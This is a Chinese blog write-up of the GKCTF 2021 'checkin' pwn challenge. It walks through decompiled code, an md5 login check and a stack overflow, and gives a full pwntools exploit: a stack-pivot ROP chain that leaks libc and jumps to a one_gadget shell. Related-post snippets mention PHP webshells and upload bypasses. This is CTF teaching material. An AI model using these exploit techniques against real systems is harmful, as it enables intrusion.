[GKCTF 2021]checkin调试与分析

最新推荐文章于 2023-08-27 10:02:10 发布
最新推荐文章于 2023-08-27 10:02:10 发布
阅读量1.3k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tokameine/article/details/119045811
版权

        目前笔者刚刚开始入门PWN,算是通过这题涨了点见识吧

主要函数:

int sub_4018C7()
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  puts("Please Sign-in");
  putchar(62);
  read(0, s1, 0x20uLL);
  puts("Please input u Pass");
  putchar(62);
  read(0, buf, 0x28uLL);
  if ( strncmp(s1, "admin", 5uLL) || sub_401974(buf) )
  {
    puts("Oh no");
    exit(0);
  }
  puts("Sign-in Success");
  return puts("BaileGeBai");
}

        sub_401974实为一个md5加密与对比函数,它会将buf进行md5后与固定值对比

__int64 __fastcall sub_401974(const char *a1)
{
  unsigned int v1; // eax
  char v3[96]; // [rsp+10h] [rbp-90h] BYREF
  __int64 v4[2]; // [rsp+70h] [rbp-30h]
  char v5[28]; // [rsp+80h] [rbp-20h] BYREF
  int i; // [rsp+9Ch] [rbp-4h]

  v4[0] = 0xA7A5577A292F2321LL;
  v4[1] = 0xC31F804A0E4A8943LL;
  sub_4007F6(v3);
  v1 = strlen(a1);
  sub_400842(v3, a1, v1);
  sub_400990(v3, v5);
  for ( i = 0; i <= 15; ++i )
  {
    if ( *(v4 + i) != v5[i] )
      return 1LL;
  }
  return 0LL;
}

        从对比方法开始说起吧,v4数组即为固定的md5值,比对方法为逐比特位对比

        

int main()
{
	INT64 v4[2];
	v4[0] = 0xA7A5577A292F2321;
	v4[1] = 0xC31F804A0E4A8943;
	BYTE k[16];
	for (int i = 0; i < 16; i++)
	{
		k[i] = *((BYTE*)v4 + i);
		printf("%x", k[i]);
	}
}//21232f297a57a5a743894ae4a801fc3

         通过对比可以发现,这个得到的结果就是v4[0]与v4[1]按照比特位分别逆序后的拼接,底层的储存方式按照小端序而被IDA识别为代码中的整数

        以及,我们可以通过一些查询得到该md5为‘admin’的md5值

        那么只要我们输入两次admin,就能够顺利运行到loc_40195D处,便能够利用栈溢出了

.text:000000000040195D loc_40195D:                             ; CODE XREF: sub_4018C7+80↑j
.text:000000000040195D                 mov     edi, offset aSignInSuccess ; "Sign-in Success"
.text:0000000000401962                 call    _puts
.text:0000000000401967                 mov     edi, offset aBailegebai ; "BaileGeBai"
.text:000000000040196C                 call    _puts
.text:0000000000401971                 nop
.text:0000000000401972                 leave
.text:0000000000401973                 retn

        但这样还不够,程序调用的是read函数,有规定的读取上限

        特殊的,第二个read函数的读取上限高于buf的界定值,产生溢出,正好覆盖RBP处的值

        以及上一层在0x4018BF处调用该函数

.text:00000000004018BF                 call    sub_4018C7
.text:00000000004018C4                 nop
.text:00000000004018C5                 leave
.text:00000000004018C6                 retn

        当主要函数retn后,立刻进入第二次retn,存在栈迁移的可能

        那么可以照如下方式构造payload

pop_rdi=0x401ab3
puts=0x4018B5
puts_got=0x602028
name_addr=0x602400
payload1="admin".ljust(8,'\x00')+p64(pop_rdi)+p64(puts_got)+p64(puts)
payload2="admin".ljust(8,'\x00')+'a'*24+p64(name_addr)

        name_addr将会在执行

  read(0, buf, 0x28uLL);

        时将RBP覆盖,然后存在两层leave指令

        当到达第二次leave指令,就相当于如下指令执行

mov esp,ebp;esp=0x602400,ebp=0x602400
pop ebp ;esp=0x602408,ebp=0x602400

        此时再执行retn指令,就会返回到 pop_rdi 处,并按照payload1的顺序执行下去造成库地址泄露(注意,我使用的puts地址将会让我返回到 puts=0x4018b5+8 处,籍此再次进入主要函数)

        但第二次进入主要函数时候则不再像第一次那样容易了,因为这次的RBP与s1数组的位置很近,输入值将会造成覆盖(buf是从rbp-20h处开始的,而当我们再次到达第二个read的时候,rbp将会是0x602410,那么我们的输入值就会覆盖掉s1,导致常规的逐步构造无法成功)

char buf[32]; // [rsp+0h] [rbp-20h] BYREF

        但也有不需要那么多参数的方法来得到shell,这里可以用onegadget实现

a@ubuntu:~/Desktop/timu$ one_gadget ./libc.so.6
0x45226	execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a	execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4	execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247	execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

        也就是说,只要我们得到了库的基地址,就可以用一行跳转直接得到shell,如果只有一行的话,就不用担心覆盖问题了,因此exp可以这样写

from pwn import *
context.log_level='debug'

p=process("./login")
elf=ELF("./login")
libc=elf.libc
pop_rdi=0x401ab3
puts=0x4018B5
puts_got=0x602028
ret_addr=0x400641
name_addr=0x602400

payload1="admin".ljust(8,'\x00')+p64(pop_rdi)+p64(puts_got)+p64(puts)
p.recvuntil('>')
p.send(payload1)
p.recvuntil('>')
payload2="admin".ljust(8,'\x00')+'a'*24+p64(name_addr)
p.send(payload2)

libc_base=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts']
print hex(libc_base)

payload3 = 'admin\x00\x00\x00'*3  +p64(0x4527a+libc_base)

p.send(payload3)
p.recvuntil('>')

#payload = 'admin\x00\x00\x00'*4 + p64( name_addr + 0x18 )
payload4 = 'admin\x00\x00\x00'*4 + p64( 0x602500 )
p.send(payload4)
p.interactive()

        值得注意的是,当笔者通过gdb附加调试之后发现,这一轮的跳转中,我们只会返回到payload3中的 p64(0x4527a+libc_base) 地址,和payload4中的地址已经没用太大关系了,只要保证payload4能够让程序返回即可

        但笔者还是在这里为payload4加上了一个地址

        正如上面所说,我们只需要用到一个返回地址即可,那倘若我们让程序第三次返回到puts=0x4018b5+8 处,这一次,RBP就会是payload4中的地址了,那么这样就能进入第三轮输入,这一次就不会出现覆盖问题,就能够像第一步的操作那样,让程序返回到system函数,将‘/bin/sh’的地址pop rdi

后话:

        算是通过这一题学着怎么用gdb了,虽然用着还是很生涩,希望多做几题之后能渐渐熟练起来吧......不过多留心一下栈堆总是好的,用IDA动调的时候倒是很会看,一旦用起了gdb就容易忽视掉这些东西,还是要多留个心眼......

附一下参考的地址:

gdb查看指定地址内存内容:https://www.cnblogs.com/super119/archive/2011/03/26/1996125.html

[原创]pwn中one_gadget的使用技巧 :https://bbs.pediy.com/thread-261112.htm

gdb的基本命令:https://blog.csdn.net/qq_26399665/article/details/81165684

Tokameine
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
青少年CTF——CheckIn文件上传绕过——WriteUp
Amazingsuger的博客
01-20 878
青少年CTF-CheckIn文件上传绕过——WriteUp
[GKCTF2020]CheckIN 详细解题思路及做法
EC_Carrot的博客
12-07 1807
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 打开题目,看到class以为是反序列化,但实际并不是,这里直接用$_REQUEST传入了参数便可以利用了。 看到base64_decode,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==(即为base64加密后的system('ls');) 发现并不能返回数据,是难道是不能这么利用吗? 接着我尝试了一下cGh
BUUCTF-CheckIn
m0_47571887的博客
11-09 776
打开题目,貌似是一道考上传的题目 上传php文件被过滤,我们就上传图片马, 我们用.htaccess来进行解析,尝试过后貌似行不通, 这里使用.user.ini .user.ini:在php.ini中的配置项中有两个配置项,一个是auto_append_file和auto_prepend_file,auto_prrpend_file意思是指定一个文件,自动包含在要执行的文件前,类似与在文件前调用了require()函数。而auto_append_file相似,只是在文件后面进行包含,使用方法很简
GKCTF2021 checkin
pondzhang的专栏
06-27 505
from pwn import * context.log_level='debug' p = process('./login') elf = ELF('./login') libc = elf.libc puts_func = 0x00000000004018B5 puts_got = 0x0000000000602028 pop_rdi_ret = 0x0000000000401ab3 main = 0x0000000000401A2A bss = 0x0000000000602400 p.recv.
buuctf web 13、[SUCTF 2019]CheckIn
m0_46412682的博客
07-16 1070
buuctf web 13、[SUCTF 2019]CheckIn 开始的页面 1、 先上传一个正常的照片 2、再上传一个php文件,提示illegal suffix 3、上传一个只含一句话木马的后缀为gif的文件,提示内容中有<? 既然过滤了<? ,所以用 4、上传7.gif,但是提示不是gif类型,exif_imagetype是文件内容的头部看是否是对应的照片类型 我们只需要再文件中填写对应的照片头部 上传成功 5、但是要怎么样才能让照片木马执行,我们想到.htaccess
RationalClearCase与MSOffice的集成
03-05
如果将ClearCase与Office进行集成,用户就可以在对Office文件修改过程中,直接在Office中进行ClearCase的操作,如文件的Checkout、Checkin等,而无需进入ClearCase中,整个操作过程将变得更加直观和方便。...
glados_checkin
03-25
glados定时签到
[GXYCTF2019]CheckIn 以及rot5/13/18/47详解
qq_45705626的博客
11-22 1020
一开始我看到了很多的符号,就猜测可能会不会是uuencode加密,测试后发现不是,但是我觉得多半也是解密以后是关于ASCII编码的情况,在看了wp以后,才知道是rot47编码,直接只知道rot13,但是不清楚rot47,解密以后得到flag。18就是13+5的合成,所以rot13的加密方法就是rot5+rot13,对数字进行rot5加密,对字母进行rot13加密。移动47位,替换成新的ASCII值,比如Z对应的ASCII值是90,则90-47=43,对应的就是+号。的替换,作用是将当前的这位数字。
[NISACTF 2022]checkin
qq_40567274的博客
04-08 4565
[NISACTF 2022] 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 提示:以下是本篇文章正文内容,下面案例可供参考 题目-join-us -1' || (select*from aa)# -1'||extractvalue(1,concat(0x5c,(select group_concat(table_name)from information_schema.tables where table_schema like 'sqlsql')))# -1' || extrac
CTF 每日一题 Day37 [GXYCTF2019]CheckIn
ChaoYue_miku的博客
02-06 476
题目名称:[GXYCTF2019]CheckIn 题目类型:Crypto 题目来源:BUUCTF 题目描述:注意:得到的 flag 请包上 flag{} 提交, flag{小写字母}
青少年CTF Crypto CheckIn
qq_41818842的博客
08-27 277
base64:大小写字母、数字和‘+’,‘/’,编码后字符数是4的倍数(不足则加=)Flag的Unicode加密是\u0066\u006c\u0061\u0067。base32:只有2-7和大写字母,编码后字符数是8的倍数(不足则加=);flag就出来了 至于为什么说看到==就想到用base64解码。打开文件发现后面有两个== 所以自然就想到先base64解码。一半会得到一长串字母和一个有意义的单词,这个单词就是密钥。Flag的base64加密是ZmxhZw==一般有一长串字母的都有可能。
GKCTF2021_checkin
z1r0的博客
04-09 413
GKCTF2021_checkin 查看保护 简单题 有一个溢出,只能溢出到rbp所以肯定栈迁移直接打。有一个小坑点就是0x20这个read,最后一个gadget不能选用puts_plt + main_addr,因为0x20不够,所以选择下面这个gadget即可,可以泄露libc又可以继续执行vuln函数 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' li =
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2803
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
[GKCTF2020]CheckIN详解
D1stiny的博客
06-01 4306
打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参 首先传参phpinfo();看看,需要经过base64编码 http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw== 找到disable_functions,发现过滤了许多危险函数 我们上传一个一句话木马看看 eval($_POST[123]);,经过base64是ZXZhbCgkX1
GKCTF web-CheckIN 解题思路writeup
qq_41743240的博客
05-24 1022
打开题目可以看到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin
简易建站(试水)过程
Morlvoid的博客
06-30 154
参考教程 : B站视频教程 : 视频链接 : 10分钟拥有真正意义上属于自己的网站!网站搭建! ( 并没有完全按照视频教程 , 其中一些更改请参照视频和文章内容仔细对比 : ) 指导 : Tokameine 准备过程 : 域名 : 在阿里云购买域名后解析 服务器 : 阿里云轻量应用服务器 应用镜像 : BT-Panel 系统镜像 : CentOS 7.3 其他根据个人需求选择 之后付款购买 , 绑定域名 防火墙 添加规则 : 开放一些端口 ( 可能并不需要开放那么多 ) HTTP TCP
BUUCTF_web_CheckIn
silence1_的博客
08-31 2177
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值